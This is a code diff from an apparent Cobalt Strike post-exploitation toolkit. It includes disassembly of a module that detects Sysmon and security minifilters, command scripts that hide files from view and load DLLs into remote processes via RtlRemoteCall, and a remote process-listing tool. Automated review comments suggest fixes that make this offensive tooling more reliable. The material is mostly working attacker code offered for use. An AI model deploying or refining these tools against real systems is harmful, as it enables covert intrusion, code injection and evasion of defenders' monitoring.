+  0000000000000B2C: 4C 8B 44 24 38     mov         r8,qword ptr [rsp+38h]
+  0000000000000B31: 48 8B 54 24 30     mov         rdx,qword ptr [rsp+30h]
+  0000000000000B36: 48 8D 0D 00 00 00  lea         rcx,[$SG105266]
+                    00
+  0000000000000B3D: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000B42: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000B47: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  0000000000000B4D: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  0000000000000B52: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  0000000000000B58: 33 C0              xor         eax,eax
+  0000000000000B5A: 48 83 C4 58        add         rsp,58h
+  0000000000000B5E: C3                 ret
+  0000000000000B5F: CC                 int         3
+  0000000000000B60: CC                 int         3
+  0000000000000B61: CC                 int         3
+  0000000000000B62: CC                 int         3
+  0000000000000B63: CC                 int         3
+  0000000000000B64: CC                 int         3
+  0000000000000B65: CC                 int         3
+  0000000000000B66: CC                 int         3
+  0000000000000B67: CC                 int         3
+  0000000000000B68: CC                 int         3
+  0000000000000B69: CC                 int         3
+  0000000000000B6A: CC                 int         3
+  0000000000000B6B: CC                 int         3
+  0000000000000B6C: CC                 int         3
+  0000000000000B6D: CC                 int         3
+  0000000000000B6E: CC                 int         3
+  0000000000000B6F: CC                 int         3
+FindMiniFilters:
+  0000000000000B70: 48 83 EC 68        sub         rsp,68h
+  0000000000000B74: C7 44 24 38 00 04  mov         dword ptr [rsp+38h],400h
+                    00 00
+  0000000000000B7C: 8B 44 24 38        mov         eax,dword ptr [rsp+38h]
+  0000000000000B80: 48 89 44 24 48     mov         qword ptr [rsp+48h],rax
+  0000000000000B85: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  0000000000000B8B: 48 8B 4C 24 48     mov         rcx,qword ptr [rsp+48h]
+  0000000000000B90: 4C 8B C1           mov         r8,rcx
+  0000000000000B93: 33 D2              xor         edx,edx
+  0000000000000B95: 48 8B C8           mov         rcx,rax
+  0000000000000B98: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  0000000000000B9E: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  0000000000000BA3: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  0000000000000BAB: 8B 44 24 38        mov         eax,dword ptr [rsp+38h]
+  0000000000000BAF: 48 8D 4C 24 50     lea         rcx,[rsp+50h]
+  0000000000000BB4: 48 89 4C 24 20     mov         qword ptr [rsp+20h],rcx
+  0000000000000BB9: 4C 8D 4C 24 3C     lea         r9,[rsp+3Ch]
+  0000000000000BBE: 44 8B C0           mov         r8d,eax
+  0000000000000BC1: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000BC6: B9 02 00 00 00     mov         ecx,2
+  0000000000000BCB: FF 15 00 00 00 00  call        qword ptr [__imp_Fltlib$FilterFindFirst]
+  0000000000000BD1: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000BD5: 81 7C 24 30 03 01  cmp         dword ptr [rsp+30h],80070103h
+                    07 80
+  0000000000000BDD: 75 09              jne         0000000000000BE8
+  0000000000000BDF: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000BE3: E9 A8 00 00 00     jmp         0000000000000C90
+  0000000000000BE8: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000BED: 74 09              je          0000000000000BF8
+  0000000000000BEF: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000BF3: E9 98 00 00 00     jmp         0000000000000C90
+  0000000000000BF8: 48 8D 0D 00 00 00  lea         rcx,[$SG105287]
+                    00
+  0000000000000BFF: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000C04: 48 8D 0D 00 00 00  lea         rcx,[$SG105288]
+                    00
+  0000000000000C0B: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000C10: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000C15: E8 00 00 00 00     call        PrintMiniFilterData
+  0000000000000C1A: C7 44 24 34 01 00  mov         dword ptr [rsp+34h],1
+                    00 00
+  0000000000000C22: 33 C0              xor         eax,eax
+  0000000000000C24: 83 F8 01           cmp         eax,1
+  0000000000000C27: 74 4D              je          0000000000000C76
+  0000000000000C29: 48 8D 44 24 3C     lea         rax,[rsp+3Ch]
+  0000000000000C2E: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000C33: 44 8B 4C 24 38     mov         r9d,dword ptr [rsp+38h]
+  0000000000000C38: 4C 8B 44 24 40     mov         r8,qword ptr [rsp+40h]
+  0000000000000C3D: BA 02 00 00 00     mov         edx,2
+  0000000000000C42: 48 8B 4C 24 50     mov         rcx,qword ptr [rsp+50h]
+  0000000000000C47: FF 15 00 00 00 00  call        qword ptr [__imp_Fltlib$FilterFindNext]
+  0000000000000C4D: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000C51: 81 7C 24 30 03 01  cmp         dword ptr [rsp+30h],80070103h
+                    07 80
+  0000000000000C59: 75 02              jne         0000000000000C5D
+  0000000000000C5B: EB 19              jmp         0000000000000C76
+  0000000000000C5D: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000C62: 74 06              je          0000000000000C6A
+  0000000000000C64: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000C68: EB 26              jmp         0000000000000C90
+  0000000000000C6A: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000C6F: E8 00 00 00 00     call        PrintMiniFilterData
+  0000000000000C74: EB AC              jmp         0000000000000C22
+  0000000000000C76: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  0000000000000C7C: 4C 8B 44 24 40     mov         r8,qword ptr [rsp+40h]
+  0000000000000C81: 33 D2              xor         edx,edx
+  0000000000000C83: 48 8B C8           mov         rcx,rax
+  0000000000000C86: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  0000000000000C8C: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000C90: 48 83 C4 68        add         rsp,68h
+  0000000000000C94: C3                 ret
+  0000000000000C95: CC                 int         3
+  0000000000000C96: CC                 int         3
+  0000000000000C97: CC                 int         3
+  0000000000000C98: CC                 int         3
+  0000000000000C99: CC                 int         3
+  0000000000000C9A: CC                 int         3
+  0000000000000C9B: CC                 int         3
+  0000000000000C9C: CC                 int         3
+  0000000000000C9D: CC                 int         3
+  0000000000000C9E: CC                 int         3
+  0000000000000C9F: CC                 int         3
+go:
+  0000000000000CA0: 89 54 24 10        mov         dword ptr [rsp+10h],edx
+  0000000000000CA4: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000CA9: 48 83 EC 58        sub         rsp,58h
+  0000000000000CAD: C7 44 24 20 00 00  mov         dword ptr [rsp+20h],0
+                    00 00
+  0000000000000CB5: 44 8B 44 24 68     mov         r8d,dword ptr [rsp+68h]
+  0000000000000CBA: 48 8B 54 24 60     mov         rdx,qword ptr [rsp+60h]
+  0000000000000CBF: 48 8D 4C 24 30     lea         rcx,[rsp+30h]
+  0000000000000CC4: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataParse]
+  0000000000000CCA: 33 D2              xor         edx,edx
+  0000000000000CCC: 48 8D 4C 24 30     lea         rcx,[rsp+30h]
+  0000000000000CD1: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataExtract]
+  0000000000000CD7: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  0000000000000CDC: 48 8D 15 00 00 00  lea         rdx,[$SG105304]
+                    00
+  0000000000000CE3: 48 8B 4C 24 28     mov         rcx,qword ptr [rsp+28h]
+  0000000000000CE8: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$strcmp]
+  0000000000000CEE: 85 C0              test        eax,eax
+  0000000000000CF0: 75 3E              jne         0000000000000D30
+  0000000000000CF2: E8 00 00 00 00     call        FindSysmon
+  0000000000000CF7: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  0000000000000CFB: 83 7C 24 20 00     cmp         dword ptr [rsp+20h],0
+  0000000000000D00: 75 18              jne         0000000000000D1A
+  0000000000000D02: 48 8D 15 00 00 00  lea         rdx,[$SG105307]
+                    00
+  0000000000000D09: 33 C9              xor         ecx,ecx
+  0000000000000D0B: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D11: 33 C0              xor         eax,eax
+  0000000000000D13: E9 80 00 00 00     jmp         0000000000000D98
+  0000000000000D18: EB 14              jmp         0000000000000D2E
+  0000000000000D1A: E8 00 00 00 00     call        BeaconOutputStreamW
+  0000000000000D1F: 48 8D 15 00 00 00  lea         rdx,[$SG105308]
+                    00
+  0000000000000D26: 33 C9              xor         ecx,ecx
+  0000000000000D28: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D2E: EB 66              jmp         0000000000000D96
+  0000000000000D30: 48 8D 15 00 00 00  lea         rdx,[$SG105311]
+                    00
+  0000000000000D37: 48 8B 4C 24 28     mov         rcx,qword ptr [rsp+28h]
+  0000000000000D3C: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$strcmp]
+  0000000000000D42: 85 C0              test        eax,eax
+  0000000000000D44: 75 3E              jne         0000000000000D84
+  0000000000000D46: E8 00 00 00 00     call        FindMiniFilters
+  0000000000000D4B: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  0000000000000D4F: 83 7C 24 20 00     cmp         dword ptr [rsp+20h],0
+  0000000000000D54: 75 18              jne         0000000000000D6E
+  0000000000000D56: 48 8D 15 00 00 00  lea         rdx,[$SG105314]
+                    00
+  0000000000000D5D: B9 0D 00 00 00     mov         ecx,0Dh
+  0000000000000D62: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D68: 33 C0              xor         eax,eax
+  0000000000000D6A: EB 2C              jmp         0000000000000D98
+  0000000000000D6C: EB 14              jmp         0000000000000D82
+  0000000000000D6E: E8 00 00 00 00     call        BeaconOutputStreamW
+  0000000000000D73: 48 8D 15 00 00 00  lea         rdx,[$SG105315]
+                    00
+  0000000000000D7A: 33 C9              xor         ecx,ecx
+  0000000000000D7C: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D82: EB 12              jmp         0000000000000D96
+  0000000000000D84: 48 8D 15 00 00 00  lea         rdx,[$SG105316]
+                    00
+  0000000000000D8B: B9 0D 00 00 00     mov         ecx,0Dh
+  0000000000000D90: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D96: 33 C0              xor         eax,eax
+  0000000000000D98: 48 83 C4 58        add         rsp,58h
+  0000000000000D9C: C3                 ret
+
+  Summary
+
+          38 .chks64
+         5DA .data
+          84 .debug$S
+          DA .drectve
+          54 .pdata
+         D9D .text$mn
+          3C .xdata

BIN
KIT/FindSysmon/findsysmon.o


+ 24 - 25
KIT/HideFile/hidefile.cna

@@ -1,42 +1,41 @@
 # author REDMED-X
 
 beacon_command_register(
-	"hidefile", "Hide file or directory by setting it's attributes to systemfile + hidden.\n",
-	"INFO:\nHide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.\n\nOPTIONS:\n[dir]: set this option if you want to modify the attributes of a directory.\n[file]: set this option if you want to modify the attributes of a file.\n[<path to dir/file>]: path to the directory or file that you want to hide.\n\n" .
-	"USAGE:\nhidefile <dir | file> <path to dir/file>\n\n");
+    "hidefile", "Hide file or directory by setting it's attributes to systemfile + hidden.\n",
+    "INFO:\nHide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.\n\nOPTIONS:\n[dir]: set this option if you want to modify the attributes of a directory.\n[file]: set this option if you want to modify the attributes of a file.\n[<path to dir/file>]: path to the directory or file that you want to hide.\n\n" .
+    "USAGE:\nhidefile <dir | file> <path to dir/file>\n\n");
 
 
 alias hidefile {
     $bid = $1;
     $option = $2;
-	$path = $3;
-
-
-	if ($option eq "") {
-		berror($bid, "Please specify one of the following options: dir | file\n");
-		return;
-	}
-	
-	if ($option eq "dir" || $option eq "file") {
-		if ($path eq "") {
-			berror($bid, "Please specify the correct path to the target directory or file.\n");
-			return;
-		}
-	}
-	else {
-		berror($bid, "This option isn't supported. Please specify one of the following options: dir | file\n");
-		return;
-	}
-	
+    $path = $3;
+
+    if ($option eq "") {
+        berror($bid, "Please specify one of the following options: dir | file\n");
+        return;
+    }
+
+    if ($option eq "dir" || $option eq "file") {
+        if ($path eq "") {
+            berror($bid, "Please specify the correct path to the target directory or file.\n");
+            return;
+        }
+    }
+    else {
+        berror($bid, "This option isn't supported. Please specify one of the following options: dir | file\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("hidefile.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "zZ", $option, $path);
-	
-	blog($bid, "Tasked to hide directory or file..");
+
+    blog($bid, "Tasked to hide directory or file..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 13 - 15
KIT/LoadLib/loadlib.cna

@@ -1,33 +1,31 @@
 # author REDMED-X
 
 beacon_command_register(
-	"loadlib", "Load DLL from disk in remote process via RPC call.",
-	"INFO:\nLoad a on disk present DLL via RtlRemoteCall API in a remote process.\nDepending on the process from which you run this tool, it may or may not work.\n\nOPTIONS:\n[pid]: target process to load the DLL into\n[path]: full path to the on disk present DLL\n\n" .
-	"USAGE:\nloadlib <pid> <path to dll>\n\n");
+    "loadlib", "Load DLL from disk in remote process via RPC call.",
+    "INFO:\nLoad a on disk present DLL via RtlRemoteCall API in a remote process.\nDepending on the process from which you run this tool, it may or may not work.\n\nOPTIONS:\n[pid]: target process to load the DLL into\n[path]: full path to the on disk present DLL\n\n" .
+    "USAGE:\nloadlib <pid> <path to dll>\n\n");
 
 
 alias loadlib {
     $bid = $1;
     $pid = $2;
     $path = $3;
-	
-	if ($pid eq "" || $path eq "") {
-		berror($bid, "Please make sure that both the PID and PATH are specified.");
-		return;
-	}
-	
-	
+
+    if ($pid eq "" || $path eq "") {
+        berror($bid, "Please make sure that both the PID and PATH are specified.");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("loadlib.o"));
     $data   = readb($handle, -1);
     closef($handle);
-	
-	
+
     # Pack our arguments
     $arg_data  = bof_pack($bid, "iz", $pid, $path);
-    
-	blog($bid, "Tasked to load DLL in remote process..");
-	
+
+    blog($bid, "Tasked to load DLL in remote process..");
+
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 14 - 5
KIT/PSremote/psremote.c

@@ -98,16 +98,17 @@ CleanUp:
 }
 
 
-int ListProcesses(HANDLE handleTargetHost) {
+BOOL ListProcesses(HANDLE handleTargetHost) {
 
 	WTS_PROCESS_INFOA * proc_info;
 	DWORD pi_count = 0;
 	LPSTR procName; 
 	WCHAR WCprocName[256];
+	BOOL RemoteProc = FALSE;
 	
 	if (!WTSAPI32$WTSEnumerateProcessesA(handleTargetHost, 0, 1, &proc_info, &pi_count)) {
 		 BeaconPrintf(CALLBACK_ERROR, "Failed to get a valid handle to the specified host!\n");
-		return -1;
+		return RemoteProc;
 	}
 	
 	BeaconPrintToStreamW(L"\nProcess name\t\t\t\tPID\t\t\tSessionID\n");
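Review bot: The new early return on the WTSEnumerateProcessesA failure path leaves the server handle open, because `WTSAPI32$WTSCloseServer(handleTargetHost)` is only reached on the success path at the end of the function, so every failed call leaks the handle opened by the caller. Add `WTSAPI32$WTSCloseServer(handleTargetHost);` before `return RemoteProc;` in that branch. The error text also cannot tell an access-denied from an unreachable or misspelled host; if a `GetLastError` import is available in this file, printing its value here would make the later "enough privileges?" message less of a guess. ListProcesses continues past the end of this hunk.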
@@ -116,9 +117,10 @@ int ListProcesses(HANDLE handleTargetHost) {
 		procName = proc_info[i].pProcessName;
 		KERNEL32$MultiByteToWideChar(CP_ACP, 0, procName, -1, WCprocName, 256);
 		BeaconPrintToStreamW(L"%-40s\t%d\t%23d\n",WCprocName ,proc_info[i].ProcessId ,proc_info[i].SessionId);
+		RemoteProc = TRUE;
 	}
 	WTSAPI32$WTSCloseServer(handleTargetHost);
-	return 0;
+	return RemoteProc;
 }
 
 void go(char *args, int len) {
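Review bot: The `proc_info` array filled by WTSEnumerateProcessesA is never released, so each successful call leaks the buffer in the beacon process; call `WTSAPI32$WTSFreeMemory(proc_info);` after the loop, before `WTSAPI32$WTSCloseServer(handleTargetHost);`. Setting `RemoteProc = TRUE;` only inside the loop also means a successful enumeration that returns zero entries is reported to the caller as a failure and, from the message added in the later hunk, blamed on privileges; if that is intended it deserves a comment, otherwise set the flag once after the enumeration check succeeds. The body of `go` begins on the last line of this hunk and continues outside it.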
@@ -127,7 +129,7 @@ void go(char *args, int len) {
 	datap parser;
 	DWORD argSize = NULL;
 	HANDLE handleTargetHost = NULL;
-	int res;
+	BOOL res = NULL;
 
 	BeaconDataParse(&parser, args, len);
     hostName = BeaconDataExtract(&parser, &argSize);
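Review bot: `BOOL res = NULL;` initialises an integer with the null-pointer constant, which is a type mismatch that compilers warn about and reads as if `res` were a handle; write `BOOL res = FALSE;`. The pre-existing `DWORD argSize = NULL;` two lines above has the same problem and should be `DWORD argSize = 0;`. The enclosing function `go` starts and ends outside this hunk.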
@@ -135,7 +137,14 @@ void go(char *args, int len) {
 	handleTargetHost = WTSAPI32$WTSOpenServerA(hostName);
 	res = ListProcesses(handleTargetHost);
 	
-	BeaconOutputStreamW();
+	if(!res) {
+		BeaconPrintf(CALLBACK_ERROR, "[-] Couldn't list remote processes. Do you have enough privileges on the remote host?\n");
+		return 0;
+	}
+	else  {
+		BeaconOutputStreamW();
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] DONE");
+	}
 
 	return 0;
 }
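Review bot: `return 0;` inside the new `if(!res)` branch returns a value from a function declared `void go(...)`, which is ill-formed C; use `return;` there, and the existing `return 0;` at the end of the function has the same defect. On that failure branch `BeaconOutputStreamW()` is skipped, but when ListProcesses enumerated successfully and simply produced no rows it has already called BeaconPrintToStreamW, which (judging from psremote.disasm) creates the IStream and print buffer that only BeaconOutputStreamW releases, so those objects stay live in the beacon after a "failed" run; either release the stream on this path too or have ListProcesses only open it once it has something to print. The `else` after the `return` can also be dropped so the success path is not indented.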

+ 22 - 26
KIT/PSremote/psremote.cna

@@ -1,33 +1,29 @@
 # author REDMED-X
 
 beacon_command_register(
-	"psremote", "List all running processes on a remote host.\n",
-	"INFO:\nGet a list of all processes running on the remote host.\n\n" .
-	"USAGE:\npsremote <FQDN or IP remote host>\n\n");
+    "psremote", "List all running processes on a remote host.\n",
+    "INFO:\nGet a list of all processes running on the remote host.\n\n" .
+    "USAGE:\npsremote <FQDN or IP remote host>\n\n");
 
 
 alias psremote {
-	local('$handle $data $args');
-	
-	# figure out the arch of this session
     $bid = $1;
-	$remotehost = $2;
-	
-	
-	if ($remotehost eq "") {
-		berror($bid, "Please make sure that the FQDN or IP of the remote host is specified.");
-		return;
-	}
-	
-	# read in the right BOF file
-	$handle = openf(script_resource("psremote.o"));
-	$data = readb($handle, -1);
-	closef($handle);
-
-	# pack our arguments
-	$arg_data = bof_pack($1, "z", $remotehost);
-	
-	# execute it.
-	blog($bid, "Tasked to list processes of host: $+  $remotehost");
-	beacon_inline_execute($bid, $data, "go", $arg_data);
-}
+    $remotehost = $2;
+
+    if ($remotehost eq "") {
+        berror($bid, "Please make sure that the FQDN or IP of the remote host is specified.");
+        return;
+    }
+
+    # read in the right BOF file
+    $handle = openf(script_resource("psremote.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+    # pack our arguments
+    $arg_data = bof_pack($bid, "z", $remotehost);
+
+    blog($bid, "Tasked to list processes of host: $+  $remotehost");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
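Review bot: Dropping `local('$handle $data $args')` makes `$handle`, `$data`, `$arg_data` and `$remotehost` script-global, since Sleep variables are global unless declared with `local`, so concurrent invocations of this alias from different beacons can clobber each other's values. Replace the removed line with `local('$bid $remotehost $handle $data $arg_data');` as the first statement of the alias (the old declaration listed an unused `$args` and missed `$arg_data`). The same pattern applies to the other .cna files in this commit, which never had a `local` declaration.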

+ 360 - 0
KIT/PSremote/psremote.disasm

@@ -0,0 +1,360 @@
+Microsoft (R) COFF/PE Dumper Version 14.29.30148.0
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+
+Dump of file psremote.o
+
+File Type: COFF OBJECT
+
+BeaconPrintToStreamW:
+  0000000000000000: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000005: 48 89 54 24 10     mov         qword ptr [rsp+10h],rdx
+  000000000000000A: 4C 89 44 24 18     mov         qword ptr [rsp+18h],r8
+  000000000000000F: 4C 89 4C 24 20     mov         qword ptr [rsp+20h],r9
+  0000000000000014: 48 83 EC 58        sub         rsp,58h
+  0000000000000018: C7 44 24 30 01 00  mov         dword ptr [rsp+30h],1
+                    00 00
+  0000000000000020: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  0000000000000028: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],1
+                    00 01
+  0000000000000030: 77 28              ja          000000000000005A
+  0000000000000032: 4C 8D 05 00 00 00  lea         r8,[g_lpStream]
+                    00
+  0000000000000039: BA 01 00 00 00     mov         edx,1
+  000000000000003E: 33 C9              xor         ecx,ecx
+  0000000000000040: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CreateStreamOnHGlobal]
+  0000000000000046: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000004A: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  000000000000004F: 7D 09              jge         000000000000005A
+  0000000000000051: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  0000000000000055: E9 01 01 00 00     jmp         000000000000015B
+  000000000000005A: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],1
+                    00 01
+  0000000000000062: 77 2E              ja          0000000000000092
+  0000000000000064: BA 02 00 00 00     mov         edx,2
+  0000000000000069: B9 00 20 00 00     mov         ecx,2000h
+  000000000000006E: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$calloc]
+  0000000000000074: 48 89 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],rax
+                    00
+  000000000000007B: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000083: 75 0D              jne         0000000000000092
+  0000000000000085: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  000000000000008D: E9 9D 00 00 00     jmp         000000000000012F
+  0000000000000092: 48 8D 44 24 68     lea         rax,[rsp+68h]
+  0000000000000097: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  000000000000009C: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  00000000000000A1: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000000A6: 4C 8B 4C 24 60     mov         r9,qword ptr [rsp+60h]
+  00000000000000AB: 41 B8 FF 1F 00 00  mov         r8d,1FFFh
+  00000000000000B1: BA 00 20 00 00     mov         edx,2000h
+  00000000000000B6: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000BD: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$_vsnwprintf_s]
+  00000000000000C3: 85 C0              test        eax,eax
+  00000000000000C5: 75 0A              jne         00000000000000D1
+  00000000000000C7: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  00000000000000CF: EB 5E              jmp         000000000000012F
+  00000000000000D1: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  00000000000000D9: 74 4C              je          0000000000000127
+  00000000000000DB: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000E2: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$wcslen]
+  00000000000000E8: 8B C0              mov         eax,eax
+  00000000000000EA: 48 D1 E0           shl         rax,1
+  00000000000000ED: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000000F4: 48 8B 09           mov         rcx,qword ptr [rcx]
+  00000000000000F7: 48 89 4C 24 40     mov         qword ptr [rsp+40h],rcx
+  00000000000000FC: 4C 8D 4C 24 34     lea         r9,[rsp+34h]
+  0000000000000101: 44 8B C0           mov         r8d,eax
+  0000000000000104: 48 8B 15 00 00 00  mov         rdx,qword ptr [g_lpwPrintBuffer]
+                    00
+  000000000000010B: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000112: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  0000000000000117: FF 50 20           call        qword ptr [rax+20h]
+  000000000000011A: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000011E: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000123: 7D 02              jge         0000000000000127
+  0000000000000125: EB 08              jmp         000000000000012F
+  0000000000000127: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  000000000000012F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000137: 74 15              je          000000000000014E
+  0000000000000139: 41 B8 00 40 00 00  mov         r8d,4000h
+  000000000000013F: 33 D2              xor         edx,edx
+  0000000000000141: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  0000000000000148: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  000000000000014E: 48 C7 44 24 38 00  mov         qword ptr [rsp+38h],0
+                    00 00 00
+  0000000000000157: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  000000000000015B: 48 83 C4 58        add         rsp,58h
+  000000000000015F: C3                 ret
+  0000000000000160: CC                 int         3
+  0000000000000161: CC                 int         3
+  0000000000000162: CC                 int         3
+  0000000000000163: CC                 int         3
+  0000000000000164: CC                 int         3
+  0000000000000165: CC                 int         3
+  0000000000000166: CC                 int         3
+  0000000000000167: CC                 int         3
+  0000000000000168: CC                 int         3
+  0000000000000169: CC                 int         3
+  000000000000016A: CC                 int         3
+  000000000000016B: CC                 int         3
+  000000000000016C: CC                 int         3
+  000000000000016D: CC                 int         3
+  000000000000016E: CC                 int         3
+  000000000000016F: CC                 int         3
+BeaconOutputStreamW:
+  0000000000000170: 40 57              push        rdi
+  0000000000000172: 48 81 EC A0 00 00  sub         rsp,0A0h
+                    00
+  0000000000000179: 48 8D 44 24 50     lea         rax,[rsp+50h]
+  000000000000017E: 48 8B F8           mov         rdi,rax
+  0000000000000181: 33 C0              xor         eax,eax
+  0000000000000183: B9 50 00 00 00     mov         ecx,50h
+  0000000000000188: F3 AA              rep stos    byte ptr [rdi]
+  000000000000018A: 48 C7 44 24 30 00  mov         qword ptr [rsp+30h],0
+                    00 00 00
+  0000000000000193: C7 44 24 28 00 00  mov         dword ptr [rsp+28h],0
+                    00 00
+  000000000000019B: 48 C7 44 24 20 00  mov         qword ptr [rsp+20h],0
+                    00 00 00
+  00000000000001A4: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  00000000000001AB: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000001AE: 41 B8 01 00 00 00  mov         r8d,1
+  00000000000001B4: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000001B9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000001C0: FF 50 60           call        qword ptr [rax+60h]
+  00000000000001C3: 85 C0              test        eax,eax
+  00000000000001C5: 7D 05              jge         00000000000001CC
+  00000000000001C7: E9 13 01 00 00     jmp         00000000000002DF
+  00000000000001CC: 8B 44 24 60        mov         eax,dword ptr [rsp+60h]
+  00000000000001D0: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  00000000000001D5: 48 8B 44 24 30     mov         rax,qword ptr [rsp+30h]
+  00000000000001DA: 48 FF C0           inc         rax
+  00000000000001DD: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  00000000000001E2: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000001E8: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  00000000000001ED: 4C 8B C1           mov         r8,rcx
+  00000000000001F0: BA 08 00 00 00     mov         edx,8
+  00000000000001F5: 48 8B C8           mov         rcx,rax
+  00000000000001F8: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  00000000000001FE: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000203: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  0000000000000209: 74 6B              je          0000000000000276
+  000000000000020B: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  0000000000000214: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  000000000000021B: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000021E: 45 33 C9           xor         r9d,r9d
+  0000000000000221: 45 33 C0           xor         r8d,r8d
+  0000000000000224: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000229: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
